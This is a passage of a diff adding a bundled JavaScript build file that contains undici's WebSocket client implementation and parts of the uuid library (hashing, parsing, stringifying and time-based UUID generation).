0x21 || + code > 0x7E || + char === '(' || + char === ')' || + char === '<' || + char === '>' || + char === '@' || + char === ',' || + char === ';' || + char === ':' || + char === '\\' || + char === '"' || + char === '/' || + char === '[' || + char === ']' || + char === '?' || + char === '=' || + char === '{' || + char === '}' || + code === 32 || // SP + code === 9 // HT + ) { + return false + } + } + + return true +} + +/** + * @see https://datatracker.ietf.org/doc/html/rfc6455#section-7-4 + * @param {number} code + */ +function isValidStatusCode (code) { + if (code >= 1000 && code < 1015) { + return ( + code !== 1004 && // reserved + code !== 1005 && // "MUST NOT be set as a status code" + code !== 1006 // "MUST NOT be set as a status code" + ) + } + + return code >= 3000 && code <= 4999 +} + +/** + * @param {import('./websocket').WebSocket} ws + * @param {string|undefined} reason + */ +function failWebsocketConnection (ws, reason) { + const { [kController]: controller, [kResponse]: response } = ws + + controller.abort() + + if (response?.socket && !response.socket.destroyed) { + response.socket.destroy() + } + + if (reason) { + fireEvent('error', ws, ErrorEvent, { + error: new Error(reason) + }) + } +} + +module.exports = { + isEstablished, + isClosing, + isClosed, + fireEvent, + isValidSubprotocol, + isValidStatusCode, + failWebsocketConnection, + websocketMessageReceived +} + + +/***/ }), + +/***/ 4284: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { webidl } = __nccwpck_require__(1744) +const { DOMException } = __nccwpck_require__(1037) +const { URLSerializer } = __nccwpck_require__(685) +const { getGlobalOrigin } = __nccwpck_require__(1246) +const { staticPropertyDescriptors, states, opcodes, emptyBuffer } = __nccwpck_require__(9188) +const { + kWebSocketURL, + kReadyState, + kController, + kBinaryType, + kResponse, + kSentClose, + kByteParser +} = __nccwpck_require__(7578) +const { isEstablished, isClosing, isValidSubprotocol, failWebsocketConnection, fireEvent } = __nccwpck_require__(5515) +const { establishWebSocketConnection } = __nccwpck_require__(5354) +const { WebsocketFrameSend } = __nccwpck_require__(5444) +const { ByteParser } = __nccwpck_require__(1688) +const { kEnumerableProperty, isBlobLike } = __nccwpck_require__(3983) +const { getGlobalDispatcher } = __nccwpck_require__(1892) +const { types } = __nccwpck_require__(3837) + +let experimentalWarned = false + +// https://websockets.spec.whatwg.org/#interface-definition +class WebSocket extends EventTarget { + #events = { + open: null, + error: null, + close: null, + message: null + } + + #bufferedAmount = 0 + #protocol = '' + #extensions = '' + + /** + * @param {string} url + * @param {string|string[]} protocols + */ + constructor (url, protocols = []) { + super() + + webidl.argumentLengthCheck(arguments, 1, { header: 'WebSocket constructor' }) + + if (!experimentalWarned) { + experimentalWarned = true + process.emitWarning('WebSockets are experimental, expect them to change at any time.', { + code: 'UNDICI-WS' + }) + } + + const options = webidl.converters['DOMString or sequence or WebSocketInit'](protocols) + + url = webidl.converters.USVString(url) + protocols = options.protocols + + // 1. Let baseURL be this's relevant settings object's API base URL. + const baseURL = getGlobalOrigin() + + // 1. Let urlRecord be the result of applying the URL parser to url with baseURL. + let urlRecord + + try { + urlRecord = new URL(url, baseURL) + } catch (e) { + // 3. If urlRecord is failure, then throw a "SyntaxError" DOMException. + throw new DOMException(e, 'SyntaxError') + } + + // 4. If urlRecord’s scheme is "http", then set urlRecord’s scheme to "ws". + if (urlRecord.protocol === 'http:') { + urlRecord.protocol = 'ws:' + } else if (urlRecord.protocol === 'https:') { + // 5. Otherwise, if urlRecord’s scheme is "https", set urlRecord’s scheme to "wss". + urlRecord.protocol = 'wss:' + } + + // 6. If urlRecord’s scheme is not "ws" or "wss", then throw a "SyntaxError" DOMException. + if (urlRecord.protocol !== 'ws:' && urlRecord.protocol !== 'wss:') { + throw new DOMException( + `Expected a ws: or wss: protocol, got ${urlRecord.protocol}`, + 'SyntaxError' + ) + } + + // 7. If urlRecord’s fragment is non-null, then throw a "SyntaxError" + // DOMException. + if (urlRecord.hash || urlRecord.href.endsWith('#')) { + throw new DOMException('Got fragment', 'SyntaxError') + } + + // 8. If protocols is a string, set protocols to a sequence consisting + // of just that string. + if (typeof protocols === 'string') { + protocols = [protocols] + } + + // 9. If any of the values in protocols occur more than once or otherwise + // fail to match the requirements for elements that comprise the value + // of `Sec-WebSocket-Protocol` fields as defined by The WebSocket + // protocol, then throw a "SyntaxError" DOMException. + if (protocols.length !== new Set(protocols.map(p => p.toLowerCase())).size) { + throw new DOMException('Invalid Sec-WebSocket-Protocol value', 'SyntaxError') + } + + if (protocols.length > 0 && !protocols.every(p => isValidSubprotocol(p))) { + throw new DOMException('Invalid Sec-WebSocket-Protocol value', 'SyntaxError') + } + + // 10. Set this's url to urlRecord. + this[kWebSocketURL] = new URL(urlRecord.href) + + // 11. Let client be this's relevant settings object. + + // 12. Run this step in parallel: + + // 1. Establish a WebSocket connection given urlRecord, protocols, + // and client. + this[kController] = establishWebSocketConnection( + urlRecord, + protocols, + this, + (response) => this.#onConnectionEstablished(response), + options + ) + + // Each WebSocket object has an associated ready state, which is a + // number representing the state of the connection. Initially it must + // be CONNECTING (0). + this[kReadyState] = WebSocket.CONNECTING + + // The extensions attribute must initially return the empty string. + + // The protocol attribute must initially return the empty string. + + // Each WebSocket object has an associated binary type, which is a + // BinaryType. Initially it must be "blob". + this[kBinaryType] = 'blob' + } + + /** + * @see https://websockets.spec.whatwg.org/#dom-websocket-close + * @param {number|undefined} code + * @param {string|undefined} reason + */ + close (code = undefined, reason = undefined) { + webidl.brandCheck(this, WebSocket) + + if (code !== undefined) { + code = webidl.converters['unsigned short'](code, { clamp: true }) + } + + if (reason !== undefined) { + reason = webidl.converters.USVString(reason) + } + + // 1. If code is present, but is neither an integer equal to 1000 nor an + // integer in the range 3000 to 4999, inclusive, throw an + // "InvalidAccessError" DOMException. + if (code !== undefined) { + if (code !== 1000 && (code < 3000 || code > 4999)) { + throw new DOMException('invalid code', 'InvalidAccessError') + } + } + + let reasonByteLength = 0 + + // 2. If reason is present, then run these substeps: + if (reason !== undefined) { + // 1. Let reasonBytes be the result of encoding reason. + // 2. If reasonBytes is longer than 123 bytes, then throw a + // "SyntaxError" DOMException. + reasonByteLength = Buffer.byteLength(reason) + + if (reasonByteLength > 123) { + throw new DOMException( + `Reason must be less than 123 bytes; received ${reasonByteLength}`, + 'SyntaxError' + ) + } + } + + // 3. Run the first matching steps from the following list: + if (this[kReadyState] === WebSocket.CLOSING || this[kReadyState] === WebSocket.CLOSED) { + // If this's ready state is CLOSING (2) or CLOSED (3) + // Do nothing. + } else if (!isEstablished(this)) { + // If the WebSocket connection is not yet established + // Fail the WebSocket connection and set this's ready state + // to CLOSING (2). + failWebsocketConnection(this, 'Connection was closed before it was established.') + this[kReadyState] = WebSocket.CLOSING + } else if (!isClosing(this)) { + // If the WebSocket closing handshake has not yet been started + // Start the WebSocket closing handshake and set this's ready + // state to CLOSING (2). + // - If neither code nor reason is present, the WebSocket Close + // message must not have a body. + // - If code is present, then the status code to use in the + // WebSocket Close message must be the integer given by code. + // - If reason is also present, then reasonBytes must be + // provided in the Close message after the status code. + + const frame = new WebsocketFrameSend() + + // If neither code nor reason is present, the WebSocket Close + // message must not have a body. + + // If code is present, then the status code to use in the + // WebSocket Close message must be the integer given by code. + if (code !== undefined && reason === undefined) { + frame.frameData = Buffer.allocUnsafe(2) + frame.frameData.writeUInt16BE(code, 0) + } else if (code !== undefined && reason !== undefined) { + // If reason is also present, then reasonBytes must be + // provided in the Close message after the status code. + frame.frameData = Buffer.allocUnsafe(2 + reasonByteLength) + frame.frameData.writeUInt16BE(code, 0) + // the body MAY contain UTF-8-encoded data with value /reason/ + frame.frameData.write(reason, 2, 'utf-8') + } else { + frame.frameData = emptyBuffer + } + + /** @type {import('stream').Duplex} */ + const socket = this[kResponse].socket + + socket.write(frame.createFrame(opcodes.CLOSE), (err) => { + if (!err) { + this[kSentClose] = true + } + }) + + // Upon either sending or receiving a Close control frame, it is said + // that _The WebSocket Closing Handshake is Started_ and that the + // WebSocket connection is in the CLOSING state. + this[kReadyState] = states.CLOSING + } else { + // Otherwise + // Set this's ready state to CLOSING (2). + this[kReadyState] = WebSocket.CLOSING + } + } + + /** + * @see https://websockets.spec.whatwg.org/#dom-websocket-send + * @param {NodeJS.TypedArray|ArrayBuffer|Blob|string} data + */ + send (data) { + webidl.brandCheck(this, WebSocket) + + webidl.argumentLengthCheck(arguments, 1, { header: 'WebSocket.send' }) + + data = webidl.converters.WebSocketSendData(data) + + // 1. If this's ready state is CONNECTING, then throw an + // "InvalidStateError" DOMException. + if (this[kReadyState] === WebSocket.CONNECTING) { + throw new DOMException('Sent before connected.', 'InvalidStateError') + } + + // 2. Run the appropriate set of steps from the following list: + // https://datatracker.ietf.org/doc/html/rfc6455#section-6.1 + // https://datatracker.ietf.org/doc/html/rfc6455#section-5.2 + + if (!isEstablished(this) || isClosing(this)) { + return + } + + /** @type {import('stream').Duplex} */ + const socket = this[kResponse].socket + + // If data is a string + if (typeof data === 'string') { + // If the WebSocket connection is established and the WebSocket + // closing handshake has not yet started, then the user agent + // must send a WebSocket Message comprised of the data argument + // using a text frame opcode; if the data cannot be sent, e.g. + // because it would need to be buffered but the buffer is full, + // the user agent must flag the WebSocket as full and then close + // the WebSocket connection. Any invocation of this method with a + // string argument that does not throw an exception must increase + // the bufferedAmount attribute by the number of bytes needed to + // express the argument as UTF-8. + + const value = Buffer.from(data) + const frame = new WebsocketFrameSend(value) + const buffer = frame.createFrame(opcodes.TEXT) + + this.#bufferedAmount += value.byteLength + socket.write(buffer, () => { + this.#bufferedAmount -= value.byteLength + }) + } else if (types.isArrayBuffer(data)) { + // If the WebSocket connection is established, and the WebSocket + // closing handshake has not yet started, then the user agent must + // send a WebSocket Message comprised of data using a binary frame + // opcode; if the data cannot be sent, e.g. because it would need + // to be buffered but the buffer is full, the user agent must flag + // the WebSocket as full and then close the WebSocket connection. + // The data to be sent is the data stored in the buffer described + // by the ArrayBuffer object. Any invocation of this method with an + // ArrayBuffer argument that does not throw an exception must + // increase the bufferedAmount attribute by the length of the + // ArrayBuffer in bytes. + + const value = Buffer.from(data) + const frame = new WebsocketFrameSend(value) + const buffer = frame.createFrame(opcodes.BINARY) + + this.#bufferedAmount += value.byteLength + socket.write(buffer, () => { + this.#bufferedAmount -= value.byteLength + }) + } else if (ArrayBuffer.isView(data)) { + // If the WebSocket connection is established, and the WebSocket + // closing handshake has not yet started, then the user agent must + // send a WebSocket Message comprised of data using a binary frame + // opcode; if the data cannot be sent, e.g. because it would need to + // be buffered but the buffer is full, the user agent must flag the + // WebSocket as full and then close the WebSocket connection. The + // data to be sent is the data stored in the section of the buffer + // described by the ArrayBuffer object that data references. Any + // invocation of this method with this kind of argument that does + // not throw an exception must increase the bufferedAmount attribute + // by the length of data’s buffer in bytes. + + const ab = Buffer.from(data, data.byteOffset, data.byteLength) + + const frame = new WebsocketFrameSend(ab) + const buffer = frame.createFrame(opcodes.BINARY) + + this.#bufferedAmount += ab.byteLength + socket.write(buffer, () => { + this.#bufferedAmount -= ab.byteLength + }) + } else if (isBlobLike(data)) { + // If the WebSocket connection is established, and the WebSocket + // closing handshake has not yet started, then the user agent must + // send a WebSocket Message comprised of data using a binary frame + // opcode; if the data cannot be sent, e.g. because it would need to + // be buffered but the buffer is full, the user agent must flag the + // WebSocket as full and then close the WebSocket connection. The data + // to be sent is the raw data represented by the Blob object. Any + // invocation of this method with a Blob argument that does not throw + // an exception must increase the bufferedAmount attribute by the size + // of the Blob object’s raw data, in bytes. + + const frame = new WebsocketFrameSend() + + data.arrayBuffer().then((ab) => { + const value = Buffer.from(ab) + frame.frameData = value + const buffer = frame.createFrame(opcodes.BINARY) + + this.#bufferedAmount += value.byteLength + socket.write(buffer, () => { + this.#bufferedAmount -= value.byteLength + }) + }) + } + } + + get readyState () { + webidl.brandCheck(this, WebSocket) + + // The readyState getter steps are to return this's ready state. + return this[kReadyState] + } + + get bufferedAmount () { + webidl.brandCheck(this, WebSocket) + + return this.#bufferedAmount + } + + get url () { + webidl.brandCheck(this, WebSocket) + + // The url getter steps are to return this's url, serialized. + return URLSerializer(this[kWebSocketURL]) + } + + get extensions () { + webidl.brandCheck(this, WebSocket) + + return this.#extensions + } + + get protocol () { + webidl.brandCheck(this, WebSocket) + + return this.#protocol + } + + get onopen () { + webidl.brandCheck(this, WebSocket) + + return this.#events.open + } + + set onopen (fn) { + webidl.brandCheck(this, WebSocket) + + if (this.#events.open) { + this.removeEventListener('open', this.#events.open) + } + + if (typeof fn === 'function') { + this.#events.open = fn + this.addEventListener('open', fn) + } else { + this.#events.open = null + } + } + + get onerror () { + webidl.brandCheck(this, WebSocket) + + return this.#events.error + } + + set onerror (fn) { + webidl.brandCheck(this, WebSocket) + + if (this.#events.error) { + this.removeEventListener('error', this.#events.error) + } + + if (typeof fn === 'function') { + this.#events.error = fn + this.addEventListener('error', fn) + } else { + this.#events.error = null + } + } + + get onclose () { + webidl.brandCheck(this, WebSocket) + + return this.#events.close + } + + set onclose (fn) { + webidl.brandCheck(this, WebSocket) + + if (this.#events.close) { + this.removeEventListener('close', this.#events.close) + } + + if (typeof fn === 'function') { + this.#events.close = fn + this.addEventListener('close', fn) + } else { + this.#events.close = null + } + } + + get onmessage () { + webidl.brandCheck(this, WebSocket) + + return this.#events.message + } + + set onmessage (fn) { + webidl.brandCheck(this, WebSocket) + + if (this.#events.message) { + this.removeEventListener('message', this.#events.message) + } + + if (typeof fn === 'function') { + this.#events.message = fn + this.addEventListener('message', fn) + } else { + this.#events.message = null + } + } + + get binaryType () { + webidl.brandCheck(this, WebSocket) + + return this[kBinaryType] + } + + set binaryType (type) { + webidl.brandCheck(this, WebSocket) + + if (type !== 'blob' && type !== 'arraybuffer') { + this[kBinaryType] = 'blob' + } else { + this[kBinaryType] = type + } + } + + /** + * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol + */ + #onConnectionEstablished (response) { + // processResponse is called when the "response’s header list has been received and initialized." + // once this happens, the connection is open + this[kResponse] = response + + const parser = new ByteParser(this) + parser.on('drain', function onParserDrain () { + this.ws[kResponse].socket.resume() + }) + + response.socket.ws = this + this[kByteParser] = parser + + // 1. Change the ready state to OPEN (1). + this[kReadyState] = states.OPEN + + // 2. Change the extensions attribute’s value to the extensions in use, if + // it is not the null value. + // https://datatracker.ietf.org/doc/html/rfc6455#section-9.1 + const extensions = response.headersList.get('sec-websocket-extensions') + + if (extensions !== null) { + this.#extensions = extensions + } + + // 3. Change the protocol attribute’s value to the subprotocol in use, if + // it is not the null value. + // https://datatracker.ietf.org/doc/html/rfc6455#section-1.9 + const protocol = response.headersList.get('sec-websocket-protocol') + + if (protocol !== null) { + this.#protocol = protocol + } + + // 4. Fire an event named open at the WebSocket object. + fireEvent('open', this) + } +} + +// https://websockets.spec.whatwg.org/#dom-websocket-connecting +WebSocket.CONNECTING = WebSocket.prototype.CONNECTING = states.CONNECTING +// https://websockets.spec.whatwg.org/#dom-websocket-open +WebSocket.OPEN = WebSocket.prototype.OPEN = states.OPEN +// https://websockets.spec.whatwg.org/#dom-websocket-closing +WebSocket.CLOSING = WebSocket.prototype.CLOSING = states.CLOSING +// https://websockets.spec.whatwg.org/#dom-websocket-closed +WebSocket.CLOSED = WebSocket.prototype.CLOSED = states.CLOSED + +Object.defineProperties(WebSocket.prototype, { + CONNECTING: staticPropertyDescriptors, + OPEN: staticPropertyDescriptors, + CLOSING: staticPropertyDescriptors, + CLOSED: staticPropertyDescriptors, + url: kEnumerableProperty, + readyState: kEnumerableProperty, + bufferedAmount: kEnumerableProperty, + onopen: kEnumerableProperty, + onerror: kEnumerableProperty, + onclose: kEnumerableProperty, + close: kEnumerableProperty, + onmessage: kEnumerableProperty, + binaryType: kEnumerableProperty, + send: kEnumerableProperty, + extensions: kEnumerableProperty, + protocol: kEnumerableProperty, + [Symbol.toStringTag]: { + value: 'WebSocket', + writable: false, + enumerable: false, + configurable: true + } +}) + +Object.defineProperties(WebSocket, { + CONNECTING: staticPropertyDescriptors, + OPEN: staticPropertyDescriptors, + CLOSING: staticPropertyDescriptors, + CLOSED: staticPropertyDescriptors +}) + +webidl.converters['sequence'] = webidl.sequenceConverter( + webidl.converters.DOMString +) + +webidl.converters['DOMString or sequence'] = function (V) { + if (webidl.util.Type(V) === 'Object' && Symbol.iterator in V) { + return webidl.converters['sequence'](V) + } + + return webidl.converters.DOMString(V) +} + +// This implements the propsal made in https://github.com/whatwg/websockets/issues/42 +webidl.converters.WebSocketInit = webidl.dictionaryConverter([ + { + key: 'protocols', + converter: webidl.converters['DOMString or sequence'], + get defaultValue () { + return [] + } + }, + { + key: 'dispatcher', + converter: (V) => V, + get defaultValue () { + return getGlobalDispatcher() + } + }, + { + key: 'headers', + converter: webidl.nullableConverter(webidl.converters.HeadersInit) + } +]) + +webidl.converters['DOMString or sequence or WebSocketInit'] = function (V) { + if (webidl.util.Type(V) === 'Object' && !(Symbol.iterator in V)) { + return webidl.converters.WebSocketInit(V) + } + + return { protocols: webidl.converters['DOMString or sequence'](V) } +} + +webidl.converters.WebSocketSendData = function (V) { + if (webidl.util.Type(V) === 'Object') { + if (isBlobLike(V)) { + return webidl.converters.Blob(V, { strict: false }) + } + + if (ArrayBuffer.isView(V) || types.isAnyArrayBuffer(V)) { + return webidl.converters.BufferSource(V) + } + } + + return webidl.converters.USVString(V) +} + +module.exports = { + WebSocket +} + + +/***/ }), + +/***/ 5840: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +Object.defineProperty(exports, "v1", ({ + enumerable: true, + get: function () { + return _v.default; + } +})); +Object.defineProperty(exports, "v3", ({ + enumerable: true, + get: function () { + return _v2.default; + } +})); +Object.defineProperty(exports, "v4", ({ + enumerable: true, + get: function () { + return _v3.default; + } +})); +Object.defineProperty(exports, "v5", ({ + enumerable: true, + get: function () { + return _v4.default; + } +})); +Object.defineProperty(exports, "NIL", ({ + enumerable: true, + get: function () { + return _nil.default; + } +})); +Object.defineProperty(exports, "version", ({ + enumerable: true, + get: function () { + return _version.default; + } +})); +Object.defineProperty(exports, "validate", ({ + enumerable: true, + get: function () { + return _validate.default; + } +})); +Object.defineProperty(exports, "stringify", ({ + enumerable: true, + get: function () { + return _stringify.default; + } +})); +Object.defineProperty(exports, "parse", ({ + enumerable: true, + get: function () { + return _parse.default; + } +})); + +var _v = _interopRequireDefault(__nccwpck_require__(8628)); + +var _v2 = _interopRequireDefault(__nccwpck_require__(6409)); + +var _v3 = _interopRequireDefault(__nccwpck_require__(5122)); + +var _v4 = _interopRequireDefault(__nccwpck_require__(9120)); + +var _nil = _interopRequireDefault(__nccwpck_require__(5332)); + +var _version = _interopRequireDefault(__nccwpck_require__(1595)); + +var _validate = _interopRequireDefault(__nccwpck_require__(6900)); + +var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); + +var _parse = _interopRequireDefault(__nccwpck_require__(2746)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +/***/ }), + +/***/ 4569: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +function md5(bytes) { + if (Array.isArray(bytes)) { + bytes = Buffer.from(bytes); + } else if (typeof bytes === 'string') { + bytes = Buffer.from(bytes, 'utf8'); + } + + return _crypto.default.createHash('md5').update(bytes).digest(); +} + +var _default = md5; +exports["default"] = _default; + +/***/ }), + +/***/ 5332: +/***/ ((__unused_webpack_module, exports) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; +var _default = '00000000-0000-0000-0000-000000000000'; +exports["default"] = _default; + +/***/ }), + +/***/ 2746: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _validate = _interopRequireDefault(__nccwpck_require__(6900)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +function parse(uuid) { + if (!(0, _validate.default)(uuid)) { + throw TypeError('Invalid UUID'); + } + + let v; + const arr = new Uint8Array(16); // Parse ########-....-....-....-............ + + arr[0] = (v = parseInt(uuid.slice(0, 8), 16)) >>> 24; + arr[1] = v >>> 16 & 0xff; + arr[2] = v >>> 8 & 0xff; + arr[3] = v & 0xff; // Parse ........-####-....-....-............ + + arr[4] = (v = parseInt(uuid.slice(9, 13), 16)) >>> 8; + arr[5] = v & 0xff; // Parse ........-....-####-....-............ + + arr[6] = (v = parseInt(uuid.slice(14, 18), 16)) >>> 8; + arr[7] = v & 0xff; // Parse ........-....-....-####-............ + + arr[8] = (v = parseInt(uuid.slice(19, 23), 16)) >>> 8; + arr[9] = v & 0xff; // Parse ........-....-....-....-############ + // (Use "/" to avoid 32-bit truncation when bit-shifting high-order bytes) + + arr[10] = (v = parseInt(uuid.slice(24, 36), 16)) / 0x10000000000 & 0xff; + arr[11] = v / 0x100000000 & 0xff; + arr[12] = v >>> 24 & 0xff; + arr[13] = v >>> 16 & 0xff; + arr[14] = v >>> 8 & 0xff; + arr[15] = v & 0xff; + return arr; +} + +var _default = parse; +exports["default"] = _default; + +/***/ }), + +/***/ 814: +/***/ ((__unused_webpack_module, exports) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; +var _default = /^(?:[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}|00000000-0000-0000-0000-000000000000)$/i; +exports["default"] = _default; + +/***/ }), + +/***/ 807: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = rng; + +var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +const rnds8Pool = new Uint8Array(256); // # of random values to pre-allocate + +let poolPtr = rnds8Pool.length; + +function rng() { + if (poolPtr > rnds8Pool.length - 16) { + _crypto.default.randomFillSync(rnds8Pool); + + poolPtr = 0; + } + + return rnds8Pool.slice(poolPtr, poolPtr += 16); +} + +/***/ }), + +/***/ 5274: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +function sha1(bytes) { + if (Array.isArray(bytes)) { + bytes = Buffer.from(bytes); + } else if (typeof bytes === 'string') { + bytes = Buffer.from(bytes, 'utf8'); + } + + return _crypto.default.createHash('sha1').update(bytes).digest(); +} + +var _default = sha1; +exports["default"] = _default; + +/***/ }), + +/***/ 8950: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _validate = _interopRequireDefault(__nccwpck_require__(6900)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +/** + * Convert array of 16 byte values to UUID string format of the form: + * XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX + */ +const byteToHex = []; + +for (let i = 0; i < 256; ++i) { + byteToHex.push((i + 0x100).toString(16).substr(1)); +} + +function stringify(arr, offset = 0) { + // Note: Be careful editing this code! It's been tuned for performance + // and works in ways you may not expect. See https://github.com/uuidjs/uuid/pull/434 + const uuid = (byteToHex[arr[offset + 0]] + byteToHex[arr[offset + 1]] + byteToHex[arr[offset + 2]] + byteToHex[arr[offset + 3]] + '-' + byteToHex[arr[offset + 4]] + byteToHex[arr[offset + 5]] + '-' + byteToHex[arr[offset + 6]] + byteToHex[arr[offset + 7]] + '-' + byteToHex[arr[offset + 8]] + byteToHex[arr[offset + 9]] + '-' + byteToHex[arr[offset + 10]] + byteToHex[arr[offset + 11]] + byteToHex[arr[offset + 12]] + byteToHex[arr[offset + 13]] + byteToHex[arr[offset + 14]] + byteToHex[arr[offset + 15]]).toLowerCase(); // Consistency check for valid UUID. If this throws, it's likely due to one + // of the following: + // - One or more input array values don't map to a hex octet (leading to + // "undefined" in the uuid) + // - Invalid input values for the RFC `version` or `variant` fields + + if (!(0, _validate.default)(uuid)) { + throw TypeError('Stringified UUID is invalid'); + } + + return uuid; +} + +var _default = stringify; +exports["default"] = _default; + +/***/ }), + +/***/ 8628: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _rng = _interopRequireDefault(__nccwpck_require__(807)); + +var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +// **`v1()` - Generate time-based UUID** +// +// Inspired by https://github.com/LiosK/UUID.js +// and http://docs.python.org/library/uuid.html +let _nodeId; + +let _clockseq; // Previous uuid creation time + + +let _lastMSecs = 0; +let _lastNSecs = 0; // See https://github.com/uuidjs/uuid for API details + +function v1(options, buf, offset) { + let i = buf && offset || 0; + const b = buf || new Array(16); + options = options || {}; + let node = options.node || _nodeId; + let clockseq = options.clockseq !== undefined ? options.clockseq : _clockseq; // node and clockseq need to be initialized to random values if they're not + // specified. We do this lazily to minimize issues related to insufficient + // system entropy. See #189 + + if (node == null || clockseq == null) { + const seedBytes = options.random || (options.rng || _rng.default)(); + + if (node == null) { + // Per 4.5, create and 48-bit node id, (47 random bits + multicast bit = 1) + node = _nodeId = [seedBytes[0] | 0x01, seedBytes[1], seedBytes[2], seedBytes[3], seedBytes[4], seedBytes[5]]; + } + + if (clockseq == null) { + // Per 4.2.2, randomize (14 bit) clockseq + clockseq = _clockseq = (seedBytes[6] << 8 | seedBytes[7]) & 0x3fff; + } + } // UUID timestamps are 100 nano-second units since the Gregorian epoch, + // (1582-10-15 00:00). JSNumbers aren't precise enough for this, so + // time is handled internally as 'msecs' (integer milliseconds) and 'nsecs' + // (100-nanoseconds offset from msecs) since unix epoch, 1970-01-01 00:00. + + + let msecs = options.msecs !== undefined ? options.msecs : Date.now(); // Per 4.2.1.2, use count of uuid's generated during the current clock + // cycle to simulate higher resolution clock + + let nsecs = options.nsecs !== undefined ? options.nsecs : _lastNSecs + 1; // Time since last uuid creation (in msecs) + + const dt = msecs - _lastMSecs + (nsecs - _lastNSecs) / 10000; // Per 4.2.1.2, Bump clockseq on clock regression + + if (dt < 0 && options.clockseq === undefined) { + clockseq = clockseq + 1 & 0x3fff; + } // Reset nsecs if clock regresses (new clockseq) or we've moved onto a new + // time interval + + + if ((dt < 0 || msecs > _lastMSecs) && options.nsecs === undefined) { + nsecs = 0; + } // Per 4.2.1.2 Throw error if too many uuids are requested + + + if (nsecs >= 10000) { + throw new Error("uuid.v1(): Can't create more than 10M uuids/sec"); + } + + _lastMSecs = msecs; + _lastNSecs = nsecs; + _clockseq = clockseq; // Per 4.1.4 - Convert from unix epoch to Gregorian epoch + + msecs += 12219292800000; // `time_low` + + const tl = ((msecs & 0xfffffff) * 10000 + nsecs) % 0x100000000; + b[i++] = tl >>> 24 & 0xff; + b[i++] = tl >>> 16 & 0xff; + b[i++] = tl >>> 8 & 0xff; + b[i++] = tl & 0xff; // `time_mid` + + const tmh = msecs / 0x100000000 * 10000 & 0xfffffff; + b[i++] = tmh >>> 8 & 0xff; + b[i++] = tmh & 0xff; // `time_high_and_version` + + b[i++] = tmh >>> 24 & 0xf | 0x10; // include version + + b[i++] = tmh >>> 16 & 0xff; // `clock_seq_hi_and_reserved` (Per 4.2.2 - include variant) + + b[i++] = clockseq >>> 8 | 0x80; // `clock_seq_low` + + b[i++] = clockseq & 0xff; // `node` + + for (let n = 0; n < 6; ++n) { + b[i + n] = node[n]; + } + + return buf || (0, _stringify.default)(b); +} + +var _default = v1; +exports["default"] = _default; + +/***/ }), + +/***/ 6409: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _v = _interopRequireDefault(__nccwpck_require__(5998)); + +var _md = _interopRequireDefault(__nccwpck_require__(4569)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +const v3 = (0, _v.default)('v3', 0x30, _md.default); +var _default = v3; +exports["default"] = _default; + +/***/ }), + +/***/ 5998: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = _default; +exports.URL = exports.DNS = void 0; + +var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); + +var _parse = _interopRequireDefault(__nccwpck_require__(2746)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +function stringToBytes(str) { + str = unescape(encodeURIComponent(str)); // UTF8 escape + + const bytes = []; + + for (let i = 0; i < str.length; ++i) { + bytes.push(str.charCodeAt(i)); + } + + return bytes; +} + +const DNS = '6ba7b810-9dad-11d1-80b4-00c04fd430c8'; +exports.DNS = DNS; +const URL = '6ba7b811-9dad-11d1-80b4-00c04fd430c8'; +exports.URL = URL; + +function _default(name, version, hashfunc) { + function generateUUID(value, namespace, buf, offset) { + if (typeof value === 'string') { + value = stringToBytes(value); + } + + if (typeof namespace === 'string') { + namespace = (0, _parse.default)(namespace); + } + + if (namespace.length !== 16) { + throw TypeError('Namespace must be array-like (16 iterable integer values, 0-255)'); + } // Compute hash of namespace 